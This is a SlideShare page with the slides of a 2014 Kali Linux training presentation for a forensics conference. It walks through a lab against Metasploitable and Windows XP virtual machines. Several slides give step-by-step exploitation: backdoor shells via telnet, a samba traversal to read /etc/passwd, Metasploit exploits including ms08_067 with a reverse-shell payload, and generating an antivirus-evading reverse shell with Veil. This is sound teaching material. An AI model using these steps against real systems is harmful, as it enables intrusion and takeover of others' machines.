Kali Linux - Falconer


Published on

This is a presentation I gave at the Spring 2014 Ohio HTCIA Conference held at Salt Fork Lodge.

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Presentation on Kali LinuxTGodfrey – Falconer TechnologiesOhio HTCIA – Salt Fork conference – 5/2014
  • http://www.hackingwithkalilinux.tk/2014/02/getting-your-pentesting-lab-ready.htmlhttp://www.hacking-tutorial.com/http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/http://efytimes.com/e1/fullnews.asp?edid=121888
  • https://pentest-tools.com/homehttp://www.softwaretestinghelp.com/penetration-testing-tools/https://pentestmag.com/http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://www.security-audit.com/blog/penetration-testing-tools/http://www.bulbsecurity.com/smartphone-pentest-framework/
  • http://kali4hackers.blogspot.com/http://www.hackingwithkalilinux.tk/2013/08/kali-linux.htmlhttp://www.youtube.com/watch?v=3OM22HqvX14http://www.kalilinux.net/community/threads/custome-command-prompt.243/http://hackwithkalilinux.blogspot.com/http://www.dailymotion.com/video/x1a348p_class-1-learn-kali-linux-basics-watch-in-hd_techhttp://www.markdubois.info/weblog/2014/02/kali-linux/http://go.kblog.us/2013/03/hacking-and-cracking-wep-with-kali-linux.htmlhttp://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/http://anonymous1769.blogspot.com/2013/12/all-commands-for-backtrack-kali-linux.htmlhttp://www.ehacking.net/2013/05/kali-linux-tutorial-websploit-framework.html
  • http://docs.kali.org/pdf/kali-book-en.pdfhttps://eforensicsmag.com/from-backtrack-to-kalilinux/http://www.amazon.com/Basic-Security-Testing-Kali-Linux/dp/1494861275/ref=sr_1_1?ie=UTF8&qid=1399928840&sr=8-1&keywords=kali+linuxhttp://www.amazon.com/Kali-Linux-Assuring-Security-Penetration/dp/184951948X/ref=sr_1_2?ie=UTF8&qid=1399928876&sr=8-2&keywords=kali+linux
  • https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/http://www.concise-courses.com/security/50-firefox-pentesting-addons/
  • https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/http://www.concise-courses.com/security/50-firefox-pentesting-addons/
  • Kali Linux - Falconer

    1. 1. Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge
    2. 2. Welcome – Salt Fork 2014
    3. 3. Welcome Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
    4. 4. Who or What is ‘Kali’?
    5. 5. Who is Kali? Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli
    6. 6. Hindu Kali
    7. 7. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
    8. 8. What’s on the DVD? /books ◦Official Kali Guide ◦eForensics /media ◦7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /metaspolitable /PPT
    9. 9. http://www.kali.org/
    10. 10. Legend  We‟re going to type something  We‟re going to make a note  Might be a question?  We‟re going to click on something  Recon  Attack
    11. 11. Ready?
    12. 12. Use your powers for good
    13. 13. Getting Ready… - Let‟s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let‟s make sure the virtual environments are working and can „ping‟ each other
    14. 14. VMware Player Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
    15. 15. Logins / Passwords Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin
    16. 16. Metaspolitable V/E  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
    17. 17. Metaspolitable V/E Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx
    18. 18. Kali V/E  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
    19. 19. Kali V/E Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]
    20. 20. Kali Updating From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.
    21. 21. Are we good?
    22. 22. There are several categories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services
    23. 23. Metapackages also exist
    24. 24. Command Line Tools Presentation on Kali Linux
    25. 25. ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
    26. 26. top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor
    27. 27. df  df Tells us how much space is available or „disk free‟
    28. 28. du  du Tells us how much space is taken or „disk used‟. You can get a shorter report by…  „du –s‟ … (disk used –summary)
    29. 29. free  free How much „free‟ memory is available
    30. 30. ls  ls This is for „list‟  ls –l (list –long)  ls -la (list – long – all attributes)
    31. 31. pwd  pwd Directory structure Means „path to working directory‟ or „print working directory‟
    32. 32. ps / ps aux / pstree  ps Means „Process Status‟ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)
    33. 33. Both Environments Presentation on Kali Linux
    34. 34. Can you ‘ping’ each other? Virtual Environment #1 (Metaspolitable) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down… Virtual Environment #2 (Kali) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down…
    35. 35. CLI & Services Presentation on Kali Linux
    36. 36. traceroute  traceroute Essentially, „tracert‟ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
    37. 37. nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
    38. 38. nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan, and „A‟ is O/S detection, services, service pack.
    39. 39. rlogin (from Metaspolitable)  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
    40. 40. rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
    41. 41. showmount  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.
    42. 42. telnet  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP
    43. 43. telnet  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server
    44. 44. telnet  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
    45. 45. telnet  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
    46. 46. Are we good?
    47. 47. smbclient  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp
    48. 48. smbclient  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit
    49. 49. smbclient  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?
    50. 50. tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com
    51. 51. netdiscover On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.
    52. 52. nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
    53. 53. sqlmap On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
    54. 54. Wasp Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
    55. 55. Web Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application
    56. 56. whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
    57. 57. From Kali - msfconsole Presentation on Kali Linux
    58. 58. msfconsole From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools
    59. 59. msfconsole From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
    60. 60. msfconsole From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….
    61. 61. msfconsole From [msf>] console, search for „unreal‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
    62. 62. msfconsole From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit 
    63. 63. msfconsole From [msf>] console, search for „twiki‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
    64. 64. msfconsole From [msf>] console (ex: „twiki‟)  set RHOST <IP Address>  show options  exploit 
    65. 65. msfconsole From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2
    66. 66. msfconsole From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads
    67. 67. msfconsole From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>
    68. 68. msfconsole From [msf>] console, (target: Win XP)  show options  exploit  Any errors? 
    69. 69. From Kali – more GUI Presentation on Kali Linux
    70. 70. Zenmap Let‟s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
    71. 71. SHODAN Let‟s run SHODAN  Open a browser  www.shodanhq.com  type in „almost anything‟  …Be very nervous…
    72. 72. FERN Let‟s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker
    73. 73. recon-ng Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.
    74. 74. recon-ng Let‟s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site
    75. 75. recon-ng Let‟s run recon-ng…  set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules
    76. 76. recon-ng Let‟s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default
    77. 77. dmitry If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP‟s
    78. 78. veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
    79. 79. veil Let‟s run veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
    80. 80. veil Let‟s run veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
    81. 81. veil Let‟s run veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
    82. 82. Final Thoughts…
    83. 83. Kali Information See „Notes‟ section in this slide
    84. 84. Kali Comparisons See „Notes‟ section in this slide
    85. 85. Kali-specific Websites See „Notes‟ section in this slide
    86. 86. Kali Publications See „Notes‟ section in this slide
    87. 87. Questions/Concerns
    88. 88. But wait, that’s not all
    89. 89. Kali in a box? Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/
    90. 90. Pentesting with Firefox? The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and „use your powers for good‟.
    91. 91. Thank You
    92. 92. Thank you Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859